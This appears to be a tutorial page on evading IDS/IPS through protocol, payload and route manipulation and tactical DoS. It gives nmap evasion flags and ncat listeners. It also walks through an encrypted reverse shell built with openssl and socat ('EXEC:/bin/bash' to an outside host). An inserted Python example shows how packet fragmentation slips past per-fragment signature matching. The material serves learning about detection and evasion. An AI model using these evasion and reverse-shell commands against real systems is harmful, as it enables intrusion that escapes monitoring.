IDS/IPS evasion

An IDS (Intrusion Detection System) is a system which detects an intrusion into a host or a network. An IPS (Intrusion Prevention System) is a system which can also block the traffic. An IDS that is also an IPS can be called an IDPS (Intrusion Detection and Prevention System).

The most famous IDS/IPS is Snort. An IDS is connected to a switch, analyses the traffic and sends an alert when traffic matches its rules. To block traffic, the IPS needs to be placed inline in front of the infrastructure, but behind a firewall.

There are two types of IDS:

  • Host-Based IDS (HIDS)
  • Network-Based IDS (NIDS)

A HIDS is software installed on the host, while a NIDS is a network appliance.

An IDS has two types of detection engines:

  • Signature-Based: it needs a database storing the signatures of known malicious traffic, and it flags traffic that matches one of them
  • Anomaly-Based: the IDS first learns what normal traffic looks like (for example with machine learning), then decides whether new traffic deviates from it

Evasion via Protocol Manipulation

When we execute our RCE on the target, we need to avoid being detected by the IDS. We can use the following kinds of manipulation:

  • Protocol manipulation
  • Source port manipulation
  • IP splitting manipulation
  • Invalid packets

Some IDS or firewalls block outbound traffic except for a few protocols, like DNS or HTTPS, or only allow UDP. So we can use those protocols with ncat, for instance: ncat <target> <port>. For UDP: ncat -u <target> <port>. For listening: ncat -lvnp <port>, or ncat -ulvnp <port> for UDP.

When we scan the target, we need to avoid being detected, otherwise the administrator may block us. If the IDS does not do deep packet inspection, we can spoof the source port with nmap. For instance, we can scan ports using DNS as the source port: nmap -sU -Pn -g 53 -f <target>.

https://nmap.org/book/man-bypass-firewalls-ids.html

Another tip for avoiding detection by the IDS is to fragment our IP packets. With nmap, we can specify the option -f to fragment the packets, or we can use the Linux package fragroute: https://www.monkey.org/~dugsong/fragroute/
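To show why fragmentation defeats a signature engine that inspects packets one at a time (the signature-based detection described above), here is an added example in Python that is not part of the original page: a constructed payload is split into IP-style fragments, a per-fragment matcher misses the signature, and a matcher that reassembles the datagram first catches it. The fragment layout, the identification value and the signature string are assumptions.

```python
from typing import Dict, List, Tuple

# Constructed sample: the socat one-liner from this page, and the string an IDS rule might look for.
SIGNATURE = b"EXEC:/bin/bash"
PAYLOAD = b"socat OPENSSL:10.20.30.129:4443,verify=0 EXEC:/bin/bash\r\n"

# Minimal IP fragment model: (identification, offset in bytes, more_fragments flag, data).
# Real IP offsets are counted in 8-byte units; bytes are used here for clarity.
Fragment = Tuple[int, int, bool, bytes]

def fragment(payload: bytes, ident: int, size: int) -> List[Fragment]:
    """Split payload into fragments of `size` bytes, as nmap -f does at the IP layer."""
    frags = []
    for off in range(0, len(payload), size):
        chunk = payload[off:off + size]
        more = off + size < len(payload)
        frags.append((ident, off, more, chunk))
    return frags

def naive_match(frags: List[Fragment], sig: bytes) -> bool:
    """Stateless inspection: look for the signature inside each fragment on its own."""
    return any(sig in data for _, _, _, data in frags)

def reassemble(frags: List[Fragment]) -> Dict[int, bytes]:
    """Group fragments by identification and rebuild each datagram in offset order.
    Datagrams with a missing last fragment, a gap or an overlap are dropped, not guessed."""
    by_id: Dict[int, List[Tuple[int, bool, bytes]]] = {}
    for ident, off, more, data in frags:
        by_id.setdefault(ident, []).append((off, more, data))
    datagrams: Dict[int, bytes] = {}
    for ident, parts in by_id.items():
        parts.sort(key=lambda p: p[0])
        if parts[-1][1]:          # last fragment still has "more fragments" set: incomplete
            continue
        buf = bytearray()
        for off, _, data in parts:
            if off != len(buf):   # gap or overlap: treat as incomplete
                break
            buf += data
        else:
            datagrams[ident] = bytes(buf)
    return datagrams

def reassembling_match(frags: List[Fragment], sig: bytes) -> bool:
    """Stateful inspection: reassemble first, then match against the whole datagram."""
    return any(sig in d for d in reassemble(frags).values())

if __name__ == "__main__":
    frags = fragment(PAYLOAD, ident=0x1234, size=8)   # 8-byte fragments, like nmap -f
    print("per-fragment match:", naive_match(frags, SIGNATURE))        # False
    print("reassembled match:", reassembling_match(frags, SIGNATURE))  # True
```

A NIDS that reassembles fragments (Snort's frag3 preprocessor, for example) closes this gap, which is why the -f trick only works against inspection that is stateless.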

We can also send invalid packets: in general, the IDS only inspects valid packets. With nmap, we can use the option --badsum to send packets with an incorrect checksum. If you want to craft your own packets, you can use the tool hping3.

Evasion via Payload Manipulation

If we push our RCE script to the target, we need to protect our payload to avoid detection by the IDS or by the administrator. So it is important to encrypt our data. There are three techniques:

  • Obfuscation
  • Encryption
  • Modification

Obfuscation means encoding your data, for instance in base64, but that can be decoded easily. If you send a URL, you can encode it with the tool urlencode, available in the package gridsite-clients. It encodes some characters as hex values: %HH.

The better solution is to encrypt your data with a certificate. Generate a certificate:

openssl req -x509 -newkey rsa:4096 -days 365 -subj '/CN=www.bucchino.org/O=Bucchino/C=FR' -nodes -keyout certificate.key -out certificate.crt
cat certificate.key certificate.crt > certificate.pem

Then, you listen with the certificate:

socat -d -d OPENSSL-LISTEN:4443,cert=certificate.pem,verify=0,fork STDOUT

And you execute your RCE through the encrypted channel:

socat OPENSSL:10.20.30.129:4443,verify=0 EXEC:/bin/bash

Evasion via Route Manipulation

Evasion via route manipulation includes two kinds:

  • Source routing
  • Proxy servers

With source routing, you force your packets to take another route to reach their destination. You can do that with nmap and the option --ip-options.

With proxy servers, you hide the true source behind a proxy. With nmap, you can use the option --proxies to specify your proxies. Nmap supports two kinds of proxies: HTTPS and SOCKS4.

Evasion via Tactical DoS

To avoid being detected by the IDS/IPS, we can generate a DoS with legitimate traffic to congest the channel and overload the processing capacity of the IDS/IPS.